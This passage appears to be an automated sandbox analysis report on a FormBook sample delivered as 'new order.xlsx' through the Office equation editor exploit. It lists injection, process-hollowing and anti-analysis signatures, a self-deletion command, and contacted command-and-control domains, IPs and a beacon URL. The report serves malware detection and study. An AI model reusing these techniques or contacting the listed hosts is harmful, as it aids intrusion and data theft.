          Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\Public\vbc.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\Public\vbc.exeCode function: 7_2_004088C0 rdtsc 7_2_004088C0
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00409B30 LdrLoadDll,7_2_00409B30
          Source: C:\Users\Public\vbc.exeCode function: 7_2_009326F8 mov eax, dword ptr fs:[00000030h]7_2_009326F8
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_020326F8 mov eax, dword ptr fs:[00000030h]9_2_020326F8
          Source: C:\Users\Public\vbc.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\Public\vbc.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.compareionizers.com
          Source: C:\Windows\explorer.exeDomain query: www.thinking-diversity.com
          Source: C:\Windows\explorer.exeNetwork Connect: 199.59.242.153 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.globaltradeview.com
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\Public\vbc.exeMemory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5AJump to behavior
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\Public\vbc.exeThread register set: target process: 1388Jump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeThread register set: target process: 1388Jump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\Public\vbc.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\Public\vbc.exeSection unmapped: C:\Windows\SysWOW64\wlanext.exe base address: BE0000Jump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exeJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'Jump to behavior
          Source: explorer.exe, 00000008.00000000.2211807817.00000000006F0000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000008.00000000.2211807817.00000000006F0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000008.00000000.2231668260.00000000001F5000.00000004.00000020.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000008.00000000.2211807817.00000000006F0000.00000002.00000001.sdmpBinary or memory string: !Progman
          Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformationJump to behavior
          Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2246289635.0000000000430000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2373008475.0000000000210000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2372975665.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2246311708.0000000000460000.00000040.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2246289635.0000000000430000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2373008475.0000000000210000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2372975665.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2246311708.0000000000460000.00000040.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection612Masquerading111OS Credential DumpingSecurity Software Discovery221Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsExtra Window Memory Injection1Disable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection612NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol122SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information41Cached Domain CredentialsSystem Information Discovery113VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing3DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobExtra Window Memory Injection1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 452636 Sample: new order.xlsx Startdate: 22/07/2021 Architecture: WINDOWS Score: 100 39 www.legifo.com 2->39 57 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->57 59 Found malware configuration 2->59 61 Malicious sample detected (through community Yara rule) 2->61 63 12 other signatures 2->63 11 EQNEDT32.EXE 12 2->11         started        16 EXCEL.EXE 34 30 2->16         started        signatures3 process4 dnsIp5 47 103.155.80.130, 49167, 80 TWIDC-AS-APTWIDCLimitedHK unknown 11->47 33 C:\Users\user\AppData\Local\...\bin[1].exe, PE32 11->33 dropped 35 C:\Users\Public\vbc.exe, PE32 11->35 dropped 81 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 11->81 18 vbc.exe 11->18         started        37 C:\Users\user\Desktop\~$new order.xlsx, data 16->37 dropped file6 signatures7 process8 signatures9 49 Multi AV Scanner detection for dropped file 18->49 51 Machine Learning detection for dropped file 18->51 53 Tries to detect virtualization through RDTSC time measurements 18->53 55 Injects a PE file into a foreign processes 18->55 21 vbc.exe 18->21         started        process10 signatures11 65 Modifies the context of a thread in another process (thread injection) 21->65 67 Maps a DLL or memory area into another process 21->67 69 Sample uses process hollowing technique 21->69 71 Queues an APC in another process (thread injection) 21->71 24 explorer.exe 21->24 injected process12 dnsIp13 41 www.globaltradeview.com 199.59.242.153, 49169, 80 BODIS-NJUS United States 24->41 43 www.thinking-diversity.com 24->43 45 2 other IPs or domains 24->45 73 System process connects to network (likely due to code injection or exploit) 24->73 28 wlanext.exe 24->28         started        signatures14 process15 signatures16 75 Modifies the context of a thread in another process (thread injection) 28->75 77 Maps a DLL or memory area into another process 28->77 79 Tries to detect virtualization through RDTSC time measurements 28->79 31 cmd.exe 28->31         started        process17

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          new order.xlsx30%VirustotalBrowse
          new order.xlsx28%ReversingLabsDocument-OLE.Exploit.CVE-2018-0802

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\Public\vbc.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\bin[1].exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\bin[1].exe32%ReversingLabsByteCode-MSIL.Trojan.Generic
          C:\Users\Public\vbc.exe32%ReversingLabsByteCode-MSIL.Trojan.Generic

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          7.2.vbc.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          www.globaltradeview.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.google.com.br/0%Avira URL Cloudsafe
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://www.google.com.tw/0%Avira URL Cloudsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://cgi.search.biglobe.ne.jp/favicon.ico0%Avira URL Cloudsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://buscar.ozu.es/0%URL Reputationsafe
          http://buscar.ozu.es/0%URL Reputationsafe
          http://buscar.ozu.es/0%URL Reputationsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://www.thinking-diversity.com/n84e/?m8ot=8pa4DPp09N0DbNR0&YP=KbrClequBVdtRHK/gZ2KmWZGYK0xt8ME2AlExBVUQacHPbAvPt6PKzpjA4rIGWPVOlDf0Q==0%Avira URL Cloudsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://www.ozu.es/favicon.ico0%URL Reputationsafe
          http://www.ozu.es/favicon.ico0%URL Reputationsafe
          http://www.ozu.es/favicon.ico0%URL Reputationsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://cgi.search.biglobe.ne.jp/0%Avira URL Cloudsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://p.zhongsou.com/favicon.ico0%URL Reputationsafe
          http://p.zhongsou.com/favicon.ico0%URL Reputationsafe
          http://p.zhongsou.com/favicon.ico0%URL Reputationsafe
          http://service2.bfast.com/0%URL Reputationsafe
          http://service2.bfast.com/0%URL Reputationsafe
          http://service2.bfast.com/0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          thinking-diversity.com
          		34.102.136.180
          		truefalse
            		unknown
            www.globaltradeview.com
            		199.59.242.153
            		truetrueunknown
            www.legifo.com
            		52.58.78.16
            		truefalse
              		unknown
              www.thinking-diversity.com
              		unknown
              		unknowntrue
                		unknown
                www.compareionizers.com
                		unknown
                		unknowntrue
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://www.thinking-diversity.com/n84e/?m8ot=8pa4DPp09N0DbNR0&YP=KbrClequBVdtRHK/gZ2KmWZGYK0xt8ME2AlExBVUQacHPbAvPt6PKzpjA4rIGWPVOlDf0Q==false
                  • Avira URL Cloud: safe
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://www.google.com.br/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://search.chol.com/favicon.icoexplorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                    		high
                    http://www.mercadolivre.com.br/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://www.merlin.com.pl/favicon.icoexplorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://search.ebay.de/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                      		high
                      http://www.mtv.com/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                        		high
                        http://www.rambler.ru/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                          		high
                          http://www.nifty.com/favicon.icoexplorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                            		high
                            http://www.dailymail.co.uk/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www3.fnac.com/favicon.icoexplorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                              		high
                              http://buscar.ya.com/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                		high
                                http://search.yahoo.com/favicon.icoexplorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                  		high
                                  http://www.iis.fhg.de/audioPAexplorer.exe, 00000008.00000000.2218367895.0000000004B50000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.sogou.com/favicon.icoexplorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                    		high
                                    http://asp.usatoday.com/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                      		high
                                      http://fr.search.yahoo.com/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                        		high
                                        http://rover.ebay.comexplorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                          		high
                                          http://in.search.yahoo.com/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                            		high
                                            http://img.shopzilla.com/shopzilla/shopzilla.icoexplorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                              		high
                                              http://search.ebay.in/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                		high
                                                http://image.excite.co.jp/jp/favicon/lep.icoexplorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://%s.comexplorer.exe, 00000008.00000000.2228808458.000000000A330000.00000008.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		low
                                                http://msk.afisha.ru/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                  		high
                                                  http://busca.igbusca.com.br//app/static/images/favicon.icoexplorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.google.com.tw/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://search.rediff.com/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                    		high
                                                    http://www.windows.com/pctv.explorer.exe, 00000008.00000000.2216707466.0000000003C40000.00000002.00000001.sdmpfalse
                                                      		high
                                                      http://www.ya.com/favicon.icoexplorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                        		high
                                                        http://www.etmall.com.tw/favicon.icoexplorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://it.search.dada.net/favicon.icoexplorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://search.naver.com/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                          		high
                                                          http://www.google.ru/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                            		high
                                                            http://search.hanafos.com/favicon.icoexplorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://cgi.search.biglobe.ne.jp/favicon.icoexplorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.abril.com.br/favicon.icoexplorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://search.daum.net/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                              		high
                                                              http://search.naver.com/favicon.icoexplorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                		high
                                                                http://search.msn.co.jp/results.aspx?q=explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.clarin.com/favicon.icoexplorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                  		high
                                                                  http://buscar.ozu.es/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://kr.search.yahoo.com/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                    		high
                                                                    http://search.about.com/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                      		high
                                                                      http://busca.igbusca.com.br/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activityexplorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                        		high
                                                                        http://www.ask.com/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                          		high
                                                                          http://www.priceminister.com/favicon.icoexplorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                            		high
                                                                            http://www.cjmall.com/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                              		high
                                                                              http://search.centrum.cz/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                		high
                                                                                http://suche.t-online.de/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                  		high
                                                                                  http://www.google.it/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                    		high
                                                                                    http://search.auction.co.kr/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    http://www.ceneo.pl/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                      		high
                                                                                      http://www.amazon.de/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                        		high
                                                                                        http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000008.00000000.2225535708.000000000861C000.00000004.00000001.sdmpfalse
                                                                                          		high
                                                                                          http://sads.myspace.com/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                            		high
                                                                                            http://busca.buscape.com.br/favicon.icoexplorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            http://www.pchome.com.tw/favicon.icoexplorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            http://browse.guardian.co.uk/favicon.icoexplorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            http://google.pchome.com.tw/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                              		high
                                                                                              http://www.rambler.ru/favicon.icoexplorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                		high
                                                                                                http://uk.search.yahoo.com/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                  		high
                                                                                                  http://espanol.search.yahoo.com/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                    		high
                                                                                                    http://www.ozu.es/favicon.icoexplorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    		unknown
                                                                                                    http://search.sify.com/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                      		high
                                                                                                      http://openimage.interpark.com/interpark.icoexplorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                        		high
                                                                                                        http://search.yahoo.co.jp/favicon.icoexplorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
